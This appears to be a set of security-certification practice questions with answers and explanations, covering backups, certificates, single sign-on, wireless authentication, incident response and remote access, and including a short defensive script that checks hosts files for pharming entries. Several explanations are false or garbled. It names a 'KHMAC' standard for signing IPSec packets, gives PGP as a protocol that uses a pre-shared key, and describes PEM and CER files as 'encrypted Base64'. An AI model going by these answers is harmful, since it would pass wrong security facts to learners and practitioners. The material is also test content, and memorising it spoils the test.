It backs up all new files and any files that have changed since the last full or incremental backup, and resets the archive bit. An incremental backup backs up all new files and files that have changed since the last full or incremental backup, and also resets the archive bit. When restoring the data, the full backup must be restored first, followed by each incremental backup in order. Incremental backups build on each other; for example, the second incremental backup contains all of the changes made since the first incremental backup. A full backup backs up all files every time it runs. Because of the amount of data that is backed up, full backups can take a long time to complete. A full backup is used as the baseline for any backup strategy and is most appropriate when using offsite archiving. A compressed full backup backs up all files in compressed format. A differential backup backs up all new files and files that have changed since the last full backup without resetting the archive bit. When restoring the data, the full backup must be restored first, followed by the most recent differential backup. Differential backups are not dependent on each other. For example, each differential backup contains the changes made since the last full backup. Therefore, differential backups can take a significantly longer time than incremental backups. A continuous backup system is one that performs backups on a regular basis to ensure that data can be restored to a particular point in time. SQL Server is an application that provides this feature. If a continuous backup plan is not used, any data changes that occurred since the last backup must be recreated after the restore is completed. Working copies are used to store data that consists of partial or full backups that are stored at the computer center for immediate recovery purposes, if necessary.

Which of the following statements is true about a certificate revocation list?

It should be kept public. Certificate revocation lists (CRLs) should be published regularly so that users know whether an issuer's certificate is valid. If the CRL were secret, it would defy its purpose. The CRL is not usually encrypted but will be digitally signed by the certificate authority (CA). The CRL does not sign keys; instead, the CA takes care of this.

In a scenario where data integrity is crucial to the organization, which of the following is true about input validation regarding client/server applications?

It should be performed on the server side. The best answer is that it should be performed on the server side. Given the choice between server-side and client-side input validation, server-side wins out. However, both should be incorporated as secure coding methods. Using the client side only can actually create additional vulnerabilities at the server. As a programmer, you don't really care about the user's knowledge level; you have to assume that smart users or attackers will come along at some point and try to hack your forms, web pages, or other applications, and design the client and server sides of the application appropriately. Even SSL-protected pages can be hacked into if they weren't properly validated. In fact, SSL doesn't really have too much effect on the matter, especially when it comes to web forms built in PHP or other similar web programming languages.

You review the system logs for your organization's firewall and see that an implicit deny is within the ACL. Which is an example of an implicit deny?

Items not specifically given access are denied by default. If a user or group of users does not have permissions to gain access to a resource, many systems will deny access by default; this is known as implicit deny and is common in firewalls and Windows operating systems. Default access control lists, or ACLs, will be set up for implicit deny and remain that way unless they are changed. ACLs are not a secure way of moving traffic, but rather they are a secure way of permitting or denying traffic to pass through a firewall or permitting or denying a user or group of users access to resources. Implicit deny does not deny all traffic, only traffic that has not been previously allowed.

You need to digitally sign packets that are transmitted on IPSec connections for your organization's VPN. Which of the following should you implement?

KHMAC Keyed Hashing for Message Authentication Code (KHMAC) is used to digitally sign packets that are transmitted on Internet Protocol Security (IPSec) connections. The standard is also referred to as Keyed-Hash Message Authentication Code (KHMAC). Answers D, A, and B are incorrect. Data Encryption Standard (DES) is a private key encryption standard that is used in IPSec to ensure that data packets are confidentially transmitted. Diffie-Hellman facilitates encryption key sharing. Internet Security Association and Key Management Protocol (ISAKMP) supports the establishment of security associations (SAs), which are sets of parameters that define the methods used by computers to communicate securely.

Which technologies provide single sign-on authentication?

Kerberos SESAME AD Kerberos, SESAME, and Active Directory are three technologies that provide single sign-on authentication. Novell eDirectory is another example. Single sign-on addresses the problem of users having to remember multiple usernames and passwords to access different systems. It involves centrally authenticating multiple systems against a federated user database. Answers E, F, and G are incorrect. Discretionary access control (DAC), mandatory access control (MAC), and role-based access control (RBAC) are three access control models that help companies design their access control structure. While they work with authentication technologies, they do not provide single sign-on authentication by themselves. Answer A is incorrect. Remote Authentication Dial-In User Service (RADIUS) is a dial-up and virtual private network (VPN) user authentication protocol used to authenticate remote users. It provides centralized authentication and accounting features. Alone, it does not provide single sign-on authentication. RADIUS only encrypts password packets from the client to the server. Single sign-on provides many advantages. It is an efficient logon method because users only have to remember one password and only need to log on once. Resources are accessed faster because users do not need to log in for each resource access. It lowers security administration costs because only one account exists for each user. It lowers setup costs because only one account needs to be created for each user. Single sign-on allows the use of stronger passwords. Other technologies that provide single sign-on authentication are security domains, directory services, and thin clients.

Your company has recently decided to implement a Kerberos environment for user authentication. What is the most important component in a Kerberos environment?

Key Distribution Center (KDC) The Key Distribution Center (KDC) is the most important component in a Kerberos environment. It is responsible for managing all of the secret keys, authenticating all users, and issuing tickets to valid users. Kerberos authentication requires a centralized management database of all user accounts and resource passwords. None of the other components listed is as important as the KDC. Principals are the entities to which the KDC provides services. They may be users, applications, or services. Session keys are symmetric keys used to encrypt and decrypt information that is passed between the principals and the KDC. A ticket-granting ticket (TGT) is the entity issued by the authentication service (AS) on the KDC to a principal. The TGT proves principal identity throughout the communication process.

During a software development review, the cryptographic engineer advises the project manager that security can be improved by significantly slowing down the runtime of the hashing algorithm and increasing entropy by passing the input and salt back during each iteration. Which of the following best describes what the engineer is trying to achieve?

Key stretching

Which of the following is a secure wireless authentication method that uses a RADIUS server for authentication?

LEAP LEAP (Lightweight Extensible Authentication Protocol) is Cisco's version of EAP. It allows for dynamic Wired Equivalent Privacy (WEP) keys and mutual authentication with a RADIUS server. The other answers do not use a RADIUS server; they all rely on the pre-shared key (PSK). Counter Mode CBC-MAC Protocol (CCMP) is a secure alternative to Temporal Key Integrity Protocol (TKIP), both of which are used with a protocol such as WPA or WPA2. Both WEP-PSK and WPA2-PSK use pre-shared keys (PSK) that the administrator enters locally at the WAP. However, WEP should not be used in this manner, as it is deprecated. It can, however, be used in conjunction with a RADIUS server. In that scenario, it is possible to use WEP in a secure fashion.

What preserves the existence and integrity of relevant electronic records (and paper records) when litigation is imminent?

Legal hold Legal hold is the term for the preservation of information relevant to an impending lawsuit. Personnel will be instructed not to destroy or alter information relating to the topic of the lawsuit. Answer A is incorrect. Chain of custody deals with how the evidence is handled once it has been collected, and guarantees the identity and integrity of the evidence from the collection stage to its presentation in the court of law. There should be a log of who has had custody of the evidence, where it has been, and who has seen it. Active logging should also be used to document access to the evidence, including photographic or video records showing the manner in which the evidence is secured. Preserving data for a legal hold just ensures that data is retained for the appropriate period and has nothing to do with chain of custody, although chain of custody is vital to preserving evidence. Answer D is incorrect. An incident response plan describes how to respond to various types of security incidents. Incident response plans provide details on how to preserve data and logs related to an incident. Answer C is incorrect. Data sovereignty means that the data is subject to the laws of the location where it is stored. Different countries may differ in their laws for preserving the existence and integrity of records prior to litigation.

As part of the incident response team, you have been called in to help with an attack on your company's web server. You are currently working to identify the root cause of the attack. During which step of incident response does root cause analysis occur?

Lessons Learned You should perform root cause analysis during the review and close step. This is the final step in incident response. There are six steps in incident response: Preparation - Ensure that the organization is ready for an incident by documenting and adopting formal incident response procedures. Identification - Analyze events to identify an incident or data breach. If the first responder is not the person responsible for detecting the incident, the person who detects the incident should notify the first responder. This step is also often referred to as detection. Containment - Stop the incident as it occurs and preserve all evidence. Notify personnel of the incident. Escalate the incident if necessary. Containing the incident involves isolating the system or device by either quarantine or device removal. This step also involves ensuring that data loss is minimized by using the appropriate data and loss control procedures. Eradication - Fix the system or device that is affected by the incident. Formal recovery/reconstitution procedures should be documented and followed during this step of incident response. This step is also referred to as remediation. Recovery - Ensure that the system or device is repaired. Return the system or device to production. This step is also referred to as resolution. Lessons Learned - Perform a root cause analysis, and document any lessons learned. Report the incident resolution to the appropriate personnel. This step may also be referred to as review and close. During the preparation step of incident response, you may identify incidents that you can prevent or mitigate. Taking the appropriate prevention or mitigation steps is vital to ensure that your organization will not waste valuable time and resources on the incident later.

Which of the following would an antivirus program most likely not detect?

Logic Bomb Pharming Antivirus programs are meant to scan for viruses, worms, and Trojans. They are least likely to discover logic bombs because logic bombs don't manifest themselves right away. Pharming is a type of social engineering attack that antivirus programs are not designed to detect.

Which of the following is vulnerable to spoofing?

MAC filtering When MAC filtering is enabled on a WAP, it actually broadcasts information wirelessly. This makes it vulnerable to spoofing. Because MAC filtering and a disabled SSID can be easily circumvented using a network sniffer, it is very important to also use strong encryption, and possibly consider other types of network access control (such as 802.1X) and external authentication methods (such as RADIUS). WPA-LEAP and WPA-PEAP are authentication protocols designed specifically to counter spoofing and other attacks. If the SSID is enabled, there is no need to do any spoofing because the SSID can be easily scanned for by war-drivers and other attackers.

Your organization has a policy that states that user passwords must be at least 16 characters. Your computers use NTLM2 authentication for clients. Which of the following hash algorithms will be used for password authentication?

MD5 The MD5 hashing algorithm is used by NTLM2 authentication. MD5 stands for Message-Digest algorithm 5. It uses a 128-bit key and is a widely used hashing algorithm. LM hash is used with passwords of 14 or fewer characters. If you use a password of 15 characters or more on newer versions of Windows, the OS will store a constant string as the LM hash, which is effectively a null password, and thereby uncrackable. The real password will be stored as an NTLM2 hash and (in this case calculated with MD5) will be used solely. AES is the Advanced Encryption Standard, used widely in wireless networks. SHA is the Secure Hash Algorithm; SHA-1 employs a 160-bit hash and is deprecated. Newer versions of SHA are more secure than MD5.

When authenticating with PEAP, what is used to provide mutual authentication between peer computers?

MSCHAPv2 PEAP uses MSCHAPv2 most commonly. This supports authentication via Microsoft Active Directory databases. MSCHAPv1 does not allow this and is not used in PEAP. MD5 is not an authentication method and is not used by PEAP. However, MD5 is used in EAP-MD5 (as a hashing algorithm), which is also challenge-based. PEAP is a derivative of EAP (Extensible Authentication Protocol).

You are designing the environmental controls for a server room that contains several servers and other network devices. What roles will an HVAC system play in this environment? (Select the two best answers.)

Maintain appropriate humidity levels Provide an appropriate ambient temperature The HVAC system's primary responsibilities are to provide an appropriate ambient temperature for the equipment and to maintain appropriate humidity levels. This keeps the equipment from overheating and prevents electrostatic discharge (ESD). HVAC equipment cannot shield other equipment from EMI. However, some HVAC equipment needs to be shielded to reduce EMI after it is installed. Isolation can be provided by other methods such as the material used in the perimeter of the room (for example, physical firewalls). A separate ventilation system can be installed to vent fumes away from the server room; however, there shouldn't be any fumes. Products that contain fumes should be stored in a separate and specially secured area. And if a fire were to occur, the sprinkler system or special hazards system should end that threat, eliminating any fumes that were a result of the fire.

Your boss speculates that an employee in a sensitive position is committing fraud. What is the best way to identify if this is true?

Mandatory vacations Mandatory vacations should be implemented to help detect (and possibly stop) fraud, sabotage, or other malicious activity on the part of a person working in a sensitive position in an organization. Separation of duties (and job rotation) is employed when more than one person is utilized to complete a task. Although this might be a way to identify fraud, it does not take into account the possibility that one user is still committing fraud without the other user(s) noticing. It also doesn't take into account the chance that all users involved in the job rotation system could be committing fraud together. Mandatory vacations are a better method of detecting ongoing fraud. Due diligence ensures that IT risks are known and managed. Acceptable usage policies define the rules that restrict how a system may be used.

You are in the middle of the information gathering stage of the planning and deployment of a role-based access control model. Which of the following is most likely required?

Matrix of job titles with required privileges The information gathering stage of a task such as this requires a matrix of job titles and required privileges, preferably something in spreadsheet format that can easily be entered into the system quickly. Each employee in the matrix would fall into a specific role in the RBAC model. The important information here for the RBAC model is the names of employees, job titles, and their required privileges. The clearance levels are also important, but they should be translated into required privileges before they are sent to the security administrator planning the RBAC model. Rules under which certain systems can be accessed aren't required here; besides, that would be an example of rule-based access control, not role-based access control. Any group-based privileges already in place will most likely be wiped clean once the new RBAC system is up and running, so they probably aren't necessary either.

Rick is reviewing the logs of a host-based IDS. They show that the computer has been compromised by a botnet and is communicating with a master server. If Rick needs to power the computer off, which of the following types of data will be unavailable?

Memory, system processes, and network processes Memory is cleared when the computer is shut down (unless hibernation mode has been implemented). This removes system and network processes from memory. Archival storage, the master boot record, system disk, e-mail, and log files will still be available. Although two other answers had possibilities within them, they weren't altogether correct.

Which of the following is the greatest security risk of two or more companies working together under a memorandum of understanding?

MoUs are generally loose agreements that do not have strict guidelines governing the transmission of sensitive data. An MoU is generally a loose agreement. It differs from a service level agreement (SLA) and an interconnection security agreement (ISA) in that those are very specific regarding legal issues and security concerns. It could be said that an MoU between two parties cannot be held to the same legal standards as an SLA. However, that is a legal risk and not a security risk. Because the MoU may not have budgetary considerations written carefully, an entity may be left to absorb unexpected cost, but this is a financial risk, not a security risk. MoUs do not generally have strict policies concerning services performed between entities. The name implies a lot: memorandum of understanding. It is an understanding that has been met, not an agreement.

The IT director asks you to create a solution to protect your network from Internet-based attacks. The solution should include pre-admission security checks and automated remediation and should also integrate with existing network infrastructure devices. Which of the following solutions should you implement?

NAC NAC, or network access control, makes security checks of the users or the actual connections that are made before sessions are initiated. It can also remediate issues automatically if configured properly. 802.1X is an example of network access control. NAT (network address translation) converts one set of IP addresses to another. VLAN is a virtual local area network. Subnetting compartmentalizes IP networks by way of IP addresses and mathematics.

You install a network device that acts as the interface between a local area network and the Internet using one IP address. Which device did you install?

NAT router A Network Address Translation (NAT) router acts as the interface between a local area network and the Internet using one IP address. Answer C is incorrect. A VPN is a private network that is implemented over a public network, such as the Internet. Answer B is incorrect. A switch is a computer networking device that connects devices together on a computer network by using packet switching to receive, process, and forward data to the destination device. Answer A is incorrect. A firewall is a device that protects a network from unauthorized access by allowing only certain traffic to pass through it. While a firewall can also be a router, it is referred to as a firewall when its purpose is to create a DMZ.

Which of the following would you most likely find in a buffer overflow attack?

NOP instructions A large number of No Operation instructions (known as NOP or no-op instructions) can be used to overflow a buffer, which could allow unwanted code to be executed or result in a denial of service (DoS). Large numbers of NOP instructions can be used to perform a NOP slide (or NO-OP sled). Sequence numbers are how TCP packets are numbered. IV length has to do with the length of a string in a cipher. Flags are one or more bits that are set to a binary number to indicate whether something is on or off.

It has been quite some time since you have updated the network documentation for your company's CAT7 network. You want to scan the network with a tool like Solar Winds or LanHelper. In addition to finding new equipment that may have been added but not documented, what are other areas in which you can focus using these tools? (Choose all that apply.)

Network mapping Rogue system detection In addition to finding new equipment that has not been added to the documentation, network scanning tools can detect rogue systems and map the network. Rogue systems may have been placed in the network by someone to bypass security measures or to intercept traffic through an unauthorized wireless access point. Network mapping is the process of using a network scanner to produce a map of the logical or physical topology of the network. This map would be incorporated into the network documentation. Answers B and C are incorrect. While tools like Solar Winds and LanHelper can also scan wireless networks, there are other tools specifically designed for wireless scanning and cracking. Examples include Aircrack, pwdump, and Ophcrack. Vulnerability detection would identify weaknesses in the network, but would not assist you with finding new or undocumented equipment.

Which of the following would be an example of a design weakness?

Not including a DMZ Failure to build in a demilitarized zone (DMZ) is a perfect example of an architecture or network design weakness. Answer B is incorrect. System sprawl or undocumented assets are common with a growing network. As the network expands and becomes more complex, it becomes more difficult to document, as well as to manage, the assets in the network. However, it does not refer to a failure in the design of the network itself. Answer C is incorrect. New threats or zero day attacks are particularly damaging when an organization does not update its antivirus software. It may be a failure of the security policy, but it does not refer to a failure in the design of the network itself. Answer D is incorrect. Failing to store private keys, public keys, or certificates securely are examples of improper certificate and key management. Again, this is an issue with security policies and not with network architecture.

You are designing an application that will allow a user to log in to the application with the user's existing Facebook or Twitter credentials. Which service would you incorporate in the application?

OAuth OAuth is Open Authorization. The current standard, OAuth 2.0, grants an application limited access to a user's account on a third-party site, such as Facebook or Twitter. OAuth could grant the application access to a friend's list or give the application the ability to post on the user's behalf. OpenID Connect provides the authentication necessary in OAuth, but it is not the actual service that you use. It authenticates the user, and stores the user information in a token. Answers C, D, and A are incorrect. Shibboleth uses Security Assertion Markup Language (SAML), which defines security authorizations on web pages, as opposed to web page elements in HTML. Shibboleth is a single sign-on (SSO) system but does not allow the usage of Facebook or Twitter credentials. A secure token contains the user information and authentication information used by OpenID. It is not a service.

Which of the following is used to validate whether trust is in place and accurate by returning responses of "good," "unknown," or "revoked"?

OCSP OCSP (Online Certificate Status Protocol) is used as a lightweight (albeit less secure) alternative to the CRL. It validates certificates by returning responses such as "good," "unknown," and "revoked." PKI stands for public key infrastructure, which OCSP is a part of. The PKI is the entire set of software, hardware, users, computers, certificates, and so on—it is an entire infrastructure. CRL stands for certificate revocation list, which is a list of certificates that are no longer valid. The RA is the registration authority, which is used to verify requests for certificates; it forwards the response to the CA.

You have found that your system for validating keys has a latency period of 24-48 hours. As a result, a key that had been breached was accepted. You want to provide a real-time solution that will reduce this latency period. Which technology should you implement?

OCSP Online Certificate Status Protocol (OCSP) is a real-time protocol for validating keys. OCSP is replacing CRL, which takes 24-48 hours to broadcast. Answer C is incorrect. Object identifiers (OID) are optional extensions for X.509 certificates. They are dotted decimal numbers that would assist with identifying objects. Answer B is incorrect. A certificate signing request (CSR) is typically one of the first steps in getting a certificate for authentication from a certificate authority (CA). Answer A is incorrect. A certificate revocation list (CRL) is a method for listing certificates that have expired, been replaced, or were revoked. A web browser, for example, would check a CRL to verify whether or not the responding server is authentic. A CRL takes 24-48 hours to broadcast, which could cause an invalid key to be accepted.

You need to examine some additional information about a key. Specifically, you want to validate the address information of the certificate owner. What could you examine to accomplish this?

OID Object identifiers (OID) are optional extensions for X.509 certificates. They are dotted decimal numbers that would assist with identifying objects. As an example, 2.5.4.9 would identify a street address. Public and private keys are both components of a public key infrastructure (PKI). Public keys are one half of an asymmetric cipher. The sender employs a public key to encrypt a message, and the receiver uses a private key to decrypt the message. Online Certificate Status Protocol (OCSP) is a real-time protocol for validating keys. OCSP is replacing CRL, which takes 24-48 hours to broadcast. It does not usually contain information about the certificate owner.

You want to ensure that certificates that have expired, been replaced, or were revoked are no longer used. You discover that updates to the list of invalid certificates may take 24-48 hours to circulate, leaving a window of vulnerability in which invalid keys may be accepted. Which of these solutions is the BEST to use if you want to avoid accepting invalid keys?

OCSP OCSP is the BEST to use. Online Certificate Status Protocol (OCSP) is a real-time protocol for validating keys. OCSP is replacing CRL, which takes 24-48 hours to broadcast. Answer C is incorrect. A certificate revocation list (CRL) is a method for listing keys that have expired, been replaced, or were revoked. A web browser, for example, would check a CRL to verify whether or not the responding server is authentic. A CRL takes 24-48 hours to broadcast, which could cause an invalid key to be accepted. Answer B is incorrect. A certificate signing request (CSR) is typically one of the first steps in verifying the authentication of a certificate from a certificate authority (CA). This process allows the CA to verify the identity of the requestor to ensure that keys are only issued to valid recipients. Answer A is incorrect. Object identifiers (OID) are optional extensions for X.509 certificates. They are dotted decimal numbers that would assist with identifying objects. They have no effect on the time it takes to circulate invalid or revoked certificate lists.

Your company must implement a subnetwork that is highly secure. Management asks you to implement an encryption method that is used only once for a single document. Which encryption method should you use?

OTP A one-time pad (OTP) is an encryption method designed to be used only once. An OTP is a random number that is used to encrypt only one document. The OTP must be used to decrypt a file that was encrypted with the OTP. Data Encryption Standard (DES) is a private key encryption algorithm. A substitution cipher is an encryption method that substitutes one character with another character in a particular pattern. For example, the Caesar cipher is a substitution cipher that replaces a letter with a letter that appears three letters later in the alphabet. For example, in the Caesar cipher, the letter J is replaced with the letter M.

Your Internet café operates a public wireless hotspot. Which of the following should you implement?

Open system authentication The best answer listed is to use open system authentication. In a public hotspot wireless network, this means that anyone can connect as long as they know the password or passphrase. You could also utilize a captive portal, which forces the wireless client to authenticate via a special web page and possibly supply an e-mail address as part of the authentication process. Disabling the SSID would make it difficult for a computer to find the wireless network, and therefore difficult (if not impossible) for patrons to use the Internet. A MAC filter would be very inefficient as the proprietor of the establishment would need to find out the MAC address of each person coming through the door. Reducing the WAP power level is a good way to reduce the chances of war-driving, but isn't necessary in this scenario, though it is a good practice.

Your client is migrating from a Windows-based server to an Apache server. You need to convert the current X.509 certificate so that it can be used on the new Apache server. What is the original file extension for the X.509 certificate?

PFX The original file extension for the X.509 certificate is PFX. A PFX certificate file is used by Microsoft, and contains both the public and private keys. The container is fully encrypted. You should use OpenSSL to convert this into a PEM encoded file. The two most common file types for exporting the private key are PFX and P12. Privacy Enhanced Mail (PEM) certificates are primarily used for web servers, and can be read in a text editor. The PEM encoded file contains the certificate encoded in encrypted Base64. This type of file extension is used in Unix/Linux environments. In this scenario, you need to convert the X.509 certificate's file extension (PFX) to PEM. A Canonical Encoding Rules (CER) certificate contains the certificate encoded in encrypted Base64. It does not support storage of the private key or certification path. This file extension can be read by Windows servers. Like CER encoded files, Distinguished Encoding Rules (DER) encoded files do not support storage of the private key or certification path. These can be converted to PEM encoded files through SSL. By default, Windows exports certificate files as DER encoded files. This is the "parent" format of PEM. P12 is a variant of PFX.

Which of the following encryption protocols uses a PSK?

PGP

In an environment where the transmission and storage of PII data needs to be encrypted, what methods should you select? (Select the two best answers.)

PGP SSH SSH (Secure Shell) can secure connections to remote machines and is instrumental in encrypting data in motion over the network. PGP (Pretty Good Privacy) encrypts data that is meant for transit via e-mail or for data that is meant to be at rest, or simply stored somewhere for an indeterminate amount of time. These are the only answers listed that will encrypt data and/or data sessions (and are not outdated). TFTP is used to send small and basic files in an unsecure manner between two hosts on a LAN. It does not encrypt data. The Temporal Key Integrity Protocol (TKIP) is used as a security protocol in wireless networks but is outdated and should be replaced by either Counter Mode CBC-MAC Protocol (CCMP) or Advanced Encryption Standard (AES). TKIP is insecure because it makes use of RC4, which is considered outdated. The Simple Network Management Protocol (SNMP) concerns the monitoring of networks and network devices and hosts. NTLM (NT LAN Manager hash) is a cryptographic hashing protocol used with Windows passwords. This is also outdated and should be replaced with NTLMv2.

You are working on a new security system for a federal courthouse. You must ensure that both employees and contractors are able to enter the building using certificate-based authentication. Which authentication system should you integrate?

PIV A Personal Identity Verification (PIV) card is a certificate-based smart card issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login. A Common Access Card (CAC) is a certificate-based smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login. HOTP and TOTP are two types of one-time passwords (i.e., they can only be used once). Hashed One Time Passwords (HOTP) are secure passwords used with hardware tokens. Time-based One Time Passwords (TOTP) are issued for a specific period of time. Once used, or once the time expires, the TOTP is no longer valid. Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Smart cards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once stolen, the thief can use the card in the same manner as the rightful owner. As an example, if the user has access to a highly secure area by using the smart card, a thief would have the same access when using the stolen card. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user. Proximity cards are a type of smart card that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is within range of the proximity card, and the information transmitted is correct, authentication is granted. Attribute-based access control (ABAC) goes beyond authentication based on user name and password. It evaluates other factors, such as time of day and location of logons.
Another aspect would be if a user has read access to files, but is attempting to edit or delete files remotely. File system security should always be set to only allow what is absolutely essential for the user to do their job. This is also known as the principle of least privilege.

While running a new network line, you find an active network switch above the ceiling tiles of the CEO's office with cables going in various directions. What attack is occurring?

Packet sniffing The network switch is probably intercepting the cables to and from the CEO's office and copying the traffic (for example through a mirror/SPAN port) to an attacker somewhere, perhaps a malicious insider, where the packets are analyzed with a packet sniffer such as Wireshark. Treat the device as evidence: photograph it and its cabling, note which upstream switch port it feeds, and check that switch's MAC address table before you disconnect anything. Impersonation is when a person attempts to gain access to a building by posing as someone else; it is a form of social engineering. Spear phishing, another type of social engineering, targets one or more individuals specifically; it is a derivative of phishing. The highly specific version of that, whaling, which targets executives, could conceivably accompany this, but you cannot know without further analysis. MAC flooding is when a switch's content addressable memory (CAM) table is filled with frames carrying many forged source MAC addresses; once the table is full the switch fails open and floods traffic out of every port like a hub instead of switching it, which lets an attacker on any port capture traffic they would not normally see.

Which of the following are the best options when it comes to increasing the security of passwords? (Select the two best answers.)

Password complexity Password length The two best ways to increase the security of passwords are to make them longer (for example, 12 to 15 characters or more) and more complex (mixing uppercase letters, numerals, and special characters). Of the two, length matters more: each added character multiplies the search space, whereas a required symbol is often just appended as "!" at the end. The best way to enforce these requirements is to configure a policy on the system rather than rely on users. A maximum password age and a password history that blocks reuse are also commonly configured, though they are minor compared with length and complexity; current NIST guidance (SP 800-63B) in fact drops forced expiry and composition rules in favor of length, screening new passwords against lists of breached passwords, and rate-limiting logon attempts.

The IT director asks you to configure security for your network. The network is isolated from the Internet by a perimeter network. The perimeter network contains three web servers and a network intrusion detection system. You need to test the network's capability to detect and respond to a denial-of-service attack against the applications running on the web servers. What method should you use?

Penetration testing Penetration testing will give you a detailed account of whether the network can both detect and respond to a denial-of-service attack, because it actually launches the attack (with written authorization and a defined scope) and observes what the defenses do. It is active testing and should be performed during off-hours or a maintenance window, because it consumes resources on the network and on the test machine and can take the web servers down. The other three answers are forms of passive analysis. They might tell you whether the network can detect an attack, but they cannot tell you whether it can respond. Note that a network intrusion detection system (NIDS) only detects attacks and warns an administrator; it does not block anything, so your penetration test will most likely report that the network detects but cannot respond to a DoS attack unless an intrusion prevention system, rate limiting, or upstream traffic scrubbing is also in place.

What is it known as when traffic to a website is redirected to another, illegitimate site?

Pharming Pharming (a portmanteau of farming and phishing) is an attack that redirects traffic from a legitimate site to a different, illegitimate, and possibly malicious site. It can be done by compromising or poisoning a DNS server (which affects every user of that server) or by modifying the hosts file of one or more computers (which affects only those computers). A modified hosts file is easily fixed by restoring it to its default content; it lives at /etc/hosts on Unix-like systems and at %SystemRoot%\System32\drivers\etc\hosts on Windows, and the default normally contains only loopback entries. Individual computers can also be protected by enabling anti-phishing features in the web browser or adding third-party anti-phishing software, keeping antivirus software updated, and using HTTPS, since a redirected victim gets a certificate warning unless the attacker also controls a certificate the browser trusts. DNS servers can be protected through careful monitoring of DNS configurations and log files, prompt patching, restricting recursion to internal clients, and enabling DNSSEC validation. Phishing is an attempt to obtain private information from someone, usually by e-mail. Pharming attacks are often designed to "phish" for information, but phishing can be accomplished in many ways besides pharming. Whaling is a form of spear phishing that targets senior executives. Spim is the abuse of instant-messaging systems rather than e-mail.
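The hosts-file variant of pharming is easy to check for on an endpoint. The following is an added example, not part of the original quiz material: it parses hosts-file text, flags any entry that overrides a name on a watchlist (the list here is an assumed one) and, at a lower severity, any non-loopback mapping that is not a standard default entry. The sample hosts file is constructed for the example.

```python
import ipaddress

# Constructed sample hosts file (assumed data, not taken from a real system).
# The bank and login lines are the shape of what a pharming attack adds.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.0.0.5        intranet.corp.example
# attacker-added lines:
203.0.113.45    www.bank.example bank.example
198.51.100.7    login.microsoftonline.com   # "fix" for the login page
"""

# Names whose addresses must never come from the local hosts file (assumed watchlist).
WATCHLIST = {"www.bank.example", "bank.example", "login.microsoftonline.com"}

# Names that legitimately appear in a default hosts file.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback", "ip6-allnodes", "ip6-allrouters"}


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs, skipping comments and malformed lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop full-line and inline comments
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                             # not "ADDRESS name [name ...]"; ignore
        for name in parts[1:]:
            yield ip, name.lower()


def find_suspicious(text, watchlist=WATCHLIST):
    """Return (ip, name, reason) tuples for entries that could redirect traffic."""
    findings = []
    for ip, name in parse_hosts(text):
        if name in watchlist:
            findings.append((str(ip), name, "watchlisted host overridden"))
        elif not ip.is_loopback and name not in LOCAL_NAMES:
            findings.append((str(ip), name, "non-loopback mapping; verify it is intentional"))
    return findings


if __name__ == "__main__":
    for ip, name, reason in find_suspicious(SAMPLE_HOSTS):
        print(f"{name:28} -> {ip:16} {reason}")
```

To check a real machine, pass the file contents instead of the sample (for example `find_suspicious(open("/etc/hosts").read())`); the watchlist should contain the domains your users actually authenticate to.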

You are the security administrator working for a large corporation with many remote workers. You are tasked with deploying a remote access solution for both staff and contractors. Company management favors Remote Desktop Services because of its ease of use. Your current risk assessment suggests that you protect Windows as much as possible from direct ingress traffic exposure. Which of the following solutions should you choose?

Place the remote desktop server(s) on a screened subnet, and implement two-factor authentication. The key phrase is that the risk assessment wants Windows protected from direct ingress traffic. That mainly means the Windows clients, but it could include the Windows server as well. Either way, one of the best ways to secure the server is to compartmentalize the remote desktop server on a screened subnet. Contractors will be using this server too, so you do not want it anywhere near other important servers, and ideally it is isolated from all of them. Two-factor authentication is the icing on the cake and is an excellent control for remote workers, where theft or loss of laptops happens. All in all, it is the best of the listed answers. Answer A is incorrect. Changing the remote desktop port is commonly done; Microsoft Remote Desktop Services listens on 3389 (TCP, and UDP on current versions) by default, and any attacker with a little experience knows this, so moving the port raises the bar only slightly against mass scanners and not at all against a targeted attacker. More importantly, the answer gives no indication that the server is in a screened subnet, DMZ, or similar protected segment. Implementing password complexity for the Active Directory domain implies that the remote desktop server is a domain member on the internal network, which you probably do not want, or at least need to compartmentalize; password complexity should already be enabled on an enterprise network anyway. Answer D is incorrect. Distributing some kind of VPN client is a given if remote users are to connect over a VPN. IPsec VPNs (IKEv2/IPsec, or the older L2TP/IPsec) and always-on SSL/TLS VPNs are all reasonable choices, but a VPN alone does not tackle the problem of where the server sits. (A plain GRE tunnel is not a more secure alternative; GRE provides no encryption and is only protected when it is carried inside IPsec.) Also, "virtualize the remote desktop services functionality" is vague. Are we talking about the clients? The server? Both?
Most likely the clients, and virtualizing applications can have security benefits, but remote desktop client applications are not commonly virtualized. And on a large enterprise network with many remote users, a single virtualized remote access server may not keep up from a performance standpoint. Answer B is incorrect. The remote access server definitely should not sit on the internal LAN; it belongs somewhere more controlled, such as a DMZ, a dedicated screened subnet, or a cloud-hosted segment. Active Directory with SSL (meaning LDAP over SSL/TLS, port 636) is a good idea, but it again implies that the remote desktop server is on the LAN. Using a screened subnet together with multifactor authentication removes most of the security issues associated with this incorrect answer. In practice the pattern Microsoft recommends is a Remote Desktop Gateway in the screened subnet, which tunnels RDP over HTTPS (TCP 443) so that 3389 is never exposed to the Internet, with Network Level Authentication (NLA) required on the session hosts and MFA enforced at the gateway. Remember to secure your remote desktop servers with a layered defense, especially if that server must talk to a domain controller or another server on the LAN.

Mitigating risk based on cost could be described as which of the following?

